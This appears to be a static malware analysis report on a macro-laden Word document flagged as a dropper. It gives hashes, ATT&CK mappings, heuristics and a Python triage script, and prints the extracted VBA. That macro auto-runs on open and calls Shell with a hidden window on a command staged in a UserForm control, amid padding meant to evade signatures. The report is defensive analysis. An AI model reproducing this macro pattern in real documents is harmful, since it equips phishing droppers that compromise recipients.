Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 27bfe27a4f0fe8da…

MALICIOUS

Office (OOXML)

Size: 95.2 KB
Created: 2019-02-25 18:08:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2019-02-26
MD5: 2f38493885e8008f32c048958a2cdeda
SHA-1: 3b623b3085213362add7008af21248c134090386
SHA-256: 27bfe27a4f0fe8da3fabaca074cb4d3982f3b117c4d402afc6ca148eceff80be
Risk score: 282

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
T1566.001 Phishing: Spearphishing Attachment

The sample is a Word document (OOXML) carrying a VBA project whose ThisDocument module defines a Document_Open handler, so the macro runs as soon as the document is opened with macros enabled. Document_Open calls the sub z; z calls ThisDocument.run with the return value of rFODa4o; run hands that value to VBA.Shell() with window style 0 (vbHide), so the spawned process has no visible window. The command string itself never appears in the macro source: rFODa4o instantiates the UserForm module fm and returns gT5EL.txt.Text, the Text property of a control named txt on that form. Control contents are stored in the form's own storage inside vbaProject.bin, not in the module streams that olevba decompressed into macros.bas, which is why the extracted source shows no literal (olevba's UserForm string extraction is the usual way to recover it). The command is therefore unknown from this report; a hidden Shell() of a string staged in a form control is the typical shape of a downloader that fetches and runs a second-stage payload, and the ClamAV signature Doc.Dropper.Agent-6883535-0 classifies the file the same way. Everything else in the modules (numeric assignments, comparisons whose outcome is fixed, empty procedures) is padding meant to defeat signature matching.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6883535-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6883535-0
  • VBA project inside OOXML (medium, OOXML_VBA; 3 related findings)
    Document contains a VBA project (word/vbaProject.bin), so macros are present
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    VBA.Shell() is called in ThisDocument.run with window style 0 (vbHide); the command is passed in as a parameter, so no command literal is visible in the source
  • Document_Open macro (high, OLE_VBA_DOCOPEN)
    Document_Open auto-execution handler in ThisDocument; it runs when the document is opened with macros enabled
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    The compiled VBA (p-code) stream contains an auto-execution token together with shell/download/object-execution tokens. This rule exists to catch p-code-only documents and documents whose source extraction fails, where no source is available. Source extraction succeeded for this sample, so here the finding corroborates the two findings above rather than standing in for missing source.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached it. All sixteen URLs below are XML namespace URIs from the package's document parts (schemas.microsoft.com, schemas.openxmlformats.org). They appear in any document saved by a recent Word version, are never fetched at run time, and are not network indicators.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartex (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape (in document text: OOXML body / shared strings)
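The chain the heuristics above describe (auto-exec handler, call hops, Shell() with a hidden window, command staged in a UserForm control) can be walked mechanically instead of by reading the modules. The script below is an added example written for this page, not code from the analysis platform or from oletools: it parses the procedures out of olevba-style macro source, finds the auto-exec entry point, follows call references until it reaches an execution primitive, records the Shell() window style, and then traces the primitive's argument back through the parameter, the call site and the function return to the form control it is read from. VBA_SOURCE is an abridged copy of the macros.bas listing further down this page with the padding lines removed; the auto-exec and primitive name sets, and the rule that a module whose VB_Base attribute carries designer GUIDs is a UserForm, are this example's own assumptions.

```python
"""Static triage of an extracted VBA macro: find the auto-exec entry point, walk the call
graph to the execution primitive and follow its argument back to its source. Added example
for this report, not the analysis platform's code. VBA_SOURCE is an abridged copy of the
macros.bas listing on this page (dead code removed); name sets and the UserForm rule are assumptions."""
import re

VBA_SOURCE = r'''
Attribute VB_Name = "ThisDocument"
Public Function run(FW4F9uTg)
FSE7uWQV = VBA.Shell(FW4F9uTg, 0)
End Function
Sub Document_Open()
Call z
End Sub
Public Sub z()
ThisDocument.run rFODa4o
End Sub
Public Function rFODa4o()
Set gT5EL = New fm
rFODa4o = gT5EL.txt.Text
End Function
Attribute VB_Name = "fm"
Attribute VB_Base = "0{94E04F09-DE34-4658-9882-E940DCA7633A}{9D636157-66FD-4060-9DFB-F03239176D44}"
'''
AUTOEXEC = {"Document_Open", "Document_Close", "AutoOpen", "AutoClose", "Workbook_Open", "AutoExec"}
PRIMITIVES = {"Shell", "CreateObject", "GetObject", "Execute", "URLDownloadToFile"}
PROC_RE = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)\s*\(([^)]*)\)", re.I)

def parse_vba(src):
    """Procedures (name -> params, body lines) plus modules whose VB_Base has designer GUIDs (UserForms)."""
    procs, forms, cur, mod = {}, set(), None, None
    for line in src.splitlines():
        if m := re.match(r'Attribute VB_Name = "(\w+)"', line):
            mod = m.group(1)
        elif re.match(r'Attribute VB_Base = "\d\{', line):
            forms.add(mod)
        elif m := PROC_RE.match(line):
            params = re.findall(r"(?:^|,)\s*(?:Optional\s+|ByVal\s+|ByRef\s+)*(\w+)", m.group(2))
            cur = procs[m.group(1)] = {"params": params, "body": []}
        elif re.match(r"^\s*End\s+(?:Sub|Function)\b", line, re.I):
            cur = None
        elif cur is not None:
            cur["body"].append(line.strip())
    return procs, forms

def reference(body, name):
    """Text after the first reference to `name` in body, None if absent; `Module.name` counts too."""
    pat = re.compile(r"(?<![\w.])(?:\w+\.)?" + re.escape(name) + r"\b(.*)$", re.I)
    return next((m.group(1) for line in body if (m := pat.search(line))), None)

def call_args(body, callee):
    """Argument expressions at the call site, whether written `Call x`, `x a, b` or `x(a, b)`."""
    rest = (reference(body, callee) or "").strip().strip("()")
    return [a.strip() for a in rest.split(",")] if rest else []

def trace(procs):
    """Depth-first from every auto-exec procedure; collect (call path, primitive) pairs."""
    hits = []
    def walk(name, path):
        path, text = path + [name], "\n".join(procs[name]["body"])
        hits.extend((path, p) for p in sorted(PRIMITIVES) if re.search(r"\b%s\s*\(" % p, text, re.I))
        for callee in sorted(procs):                       # `callee not in path` stops recursion cycles
            if callee not in path and reference(procs[name]["body"], callee) is not None:
                walk(callee, path)
    for entry in sorted(p for p in procs if p in AUTOEXEC):
        walk(entry, [])
    return hits

def argument_origin(procs, forms, path, prim):
    """Follow the primitive's first argument back through parameters, call sites and function returns."""
    proc = path[-1]
    expr = re.search(r"\b%s\s*\(([^,)]+)" % prim, "\n".join(procs[proc]["body"]), re.I).group(1).strip()
    trail = [f"{proc}: {prim}({expr}, ...)"]
    for _ in range(8):                                     # bounded: obfuscated code may cycle
        if expr in procs[proc]["params"] and proc in path[1:]:      # a parameter: inspect the call site
            caller = path[path.index(proc) - 1]
            proc, expr = caller, call_args(procs[caller]["body"], proc)[procs[proc]["params"].index(expr)]
            trail.append(f"{proc} passes {expr}")
        elif expr in procs and (rhs := re.search(r"^\s*%s\s*=\s*(.+)$" % re.escape(expr),
                                                 "\n".join(procs[expr]["body"]), re.I | re.M)):
            proc, expr = expr, rhs.group(1).strip()        # a bare function name: take its return value
            trail.append(f"{proc} returns {expr}")
        else:                                              # an object member: was the object a New UserForm?
            obj, _, member = expr.partition(".")
            new = re.search(r"^\s*Set\s+%s\s*=\s*New\s+(\w+)" % re.escape(obj), "\n".join(procs[proc]["body"]), re.I | re.M)
            if new and new.group(1) in forms:
                trail.append(f"{new.group(1)} is a UserForm: value is read from control {member}")
            break
    return trail

def triage(src):
    """Entry points, UserForm modules and every auto-exec -> primitive chain with window style and argument origin."""
    procs, forms = parse_vba(src)
    chains = [{"path": path, "primitive": prim, "origin": argument_origin(procs, forms, path, prim),
               "hidden_window": prim == "Shell" and bool(re.search(          # window style 0 / vbHide
                   r"\bShell\s*\([^,)]*,\s*(?:0|vbHide)\b", "\n".join(procs[path[-1]]["body"]), re.I))}
              for path, prim in trace(procs)]
    return {"entry_points": sorted(p for p in procs if p in AUTOEXEC), "forms": sorted(forms), "chains": chains}
```

For this sample triage() reports one chain, Document_Open -> z -> run reaching Shell with a hidden window, and an origin trail ending in "fm is a UserForm: value is read from control txt.Text". Because the padding lines never reference another procedure, running it over the full listing instead of the abridged copy does not change the chain. The last trail entry is the actionable one: the command has to be recovered from the form's control data inside vbaProject.bin, not from macros.bas.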

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2592 bytes
SHA-256: 910eab768212bd3734f1f2d66d6d929c258419153fe10cd2dc2d345d6693549a
Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Public Function run(FW4F9uTg)
FSE7uWQV = VBA.Shell(FW4F9uTg, 0)
Dim Culyp As Long
Culyp = Sgn(0)
If Len("H8gfqRkxs") <> 247 Then
'
Else
MsgBox "aWMEGv", 32, "vuK2IT"
End If
Dim JLRm95WQN As Long
JLRm95WQN = Sgn(-1509511124)
End Function
Sub Document_Open()

Dim Zf9D1OKe As Double
Zf9D1OKe = Round(31894.571303004)
Dim IcjK5H As Double
IcjK5H = 58588.983303507
GJDNG = 29988 / 84
rYrdz7KAu = -7258 + 7262
If GJDNG = rYrdz7KAu Then
rqIwil0 = "YJnAc0UWl"
End If

Dim MXdkC5bmD As Integer
MXdkC5bmD = -21678
Call z
End Sub
Sub Document_Close()
End Sub

Attribute VB_Name = "PrB6AHpUc"
Sub U9CMXcfb()
End Sub
Function a8CY0UhD() As Integer
Dim pOV3njYgy As Boolean
pOV3njYgy = False
Dim sPhgs As Integer
Dim bua38yCw As Integer
PhD1Sa = Mid("v9SJvxMqSb9uk7Xsg8Kp65Um", -13533 + 13535, 5094 - 5089)
Vk7WGFmp = PhD1Sa
Dim QXyHT As Single
QXyHT = Round(53717.722632021)
sPhgs = 12222 / 291
bua38yCw = 15
a8CY0UhD = sPhgs - bua38yCw
End Function
Public Sub z()
Dim N96oJTWvn As Integer
N96oJTWvn = Sgn(-26980)
Dim Qj98qx As Byte
Qj98qx = 136
Dim mZTWkC As Boolean
mZTWkC = True
Dim aGxePu4y As Integer
aGxePu4y = 7510
OsKGEt = 10750 / 43
ORHd7J = -20210 + 20211
If OsKGEt = ORHd7J Then
hpxdhYZG = "zOKr2"
End If
Dim I8073 As Double
I8073 = Int(64041.156238735)
Dim fxhpz9M As Boolean
fxhpz9M = True
ThisDocument.run rFODa4o
Dim a92SETKmO As Long
a92SETKmO = Sgn(-1072668940)
End Sub

Attribute VB_Name = "opnJEa"
Sub NleSKE1(UKHxk)
End Sub

Attribute VB_Name = "wOt0NkD"
Function iSLgWMDBc() As Integer
Dim l0hguz6 As Boolean
l0hguz6 = False
Dim XRASNmGV As Integer
Dim rDsafHk As Long
XRASNmGV = 100
rDsafHk = 33
iSLgWMDBc = XRASNmGV - rDsafHk
End Function
Public Function rFODa4o()
Set gT5EL = New fm
Dim H2CeQF6Oh As Integer
H2CeQF6Oh = Sgn(30755)
RXbLTC = 394 - 94
BNm9BQw = -8819 + 8821
If RXbLTC = BNm9BQw Then
MuYmp8N6T = "CgihroP"
End If
rFODa4o = gT5EL.txt.Text
End Function

Attribute VB_Name = "fm"
Attribute VB_Base = "0{94E04F09-DE34-4658-9882-E940DCA7633A}{9D636157-66FD-4060-9DFB-F03239176D44}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 25088 bytes
SHA-256: 2b7c1942b63983a38d396c6e3dba719d08dd203efae61137c7d84ff05e6d9ece
Detection: ClamAV: Doc.Dropper.Agent-6883535-0
Obfuscation or payload: unlikely
This container also holds the storage of the fm UserForm, i.e. the control data that rFODa4o reads as gT5EL.txt.Text and that run passes to Shell(); the decoded macros.bas above does not include it.